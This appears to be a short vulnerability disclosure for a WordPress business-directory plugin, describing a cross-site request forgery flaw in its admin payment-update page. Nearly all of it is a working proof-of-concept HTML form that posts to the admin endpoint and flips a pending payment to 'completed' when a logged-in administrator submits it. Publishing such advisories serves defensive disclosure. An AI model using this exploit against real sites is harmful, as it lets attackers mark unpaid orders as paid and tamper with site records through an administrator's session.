The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator update arbitrary payment history, such as change their status (from pending to completed to example)
Add a listing, don't complete payment (status will be pending)
<form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update">
<table>
<tbody><tr><td>
payment[created_at_date]</td><td><input name="payment[created_at_date]" value="2021-03-31" size="100"></td></tr>
<tr><td>
payment[created_at_time_hour]</td><td><input name="payment[created_at_time_hour]" value="17" size="100"></td></tr>
<tr><td>
payment[created_at_time_min]</td><td><input name="payment[created_at_time_min]" value="49" size="100"></td></tr>
<tr><td>
payment[id]</td><td><input name="payment[id]" value="3" size="100"></td></tr>
<tr><td>
payment[payer_data][address]</td><td><input name="payment[payer_data][address]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][address_2]</td><td><input name="payment[payer_data][address_2]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][city]</td><td><input name="payment[payer_data][city]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][country]</td><td><input name="payment[payer_data][country]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][state]</td><td><input name="payment[payer_data][state]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][zip]</td><td><input name="payment[payer_data][zip]" value="" size="100"></td></tr>
<tr><td>
payment[payer_email]</td><td><input name="payment[payer_email]" value="[email protected]" size="100"></td></tr>
<tr><td>
payment[payer_first_name]</td><td><input name="payment[payer_first_name]" value="" size="100"></td></tr>
<tr><td>
payment[payer_last_name]</td><td><input name="payment[payer_last_name]" value="" size="100"></td></tr>
<tr><td>
payment[status]</td><td><input name="payment[status]" value="completed" size="100"></td></tr>
<tr><td>
payment_note</td><td><input name="payment_note" value="" size="100"></td></tr>
</tbody></table>
<input id="submit" type="submit" value="Submit">
</form>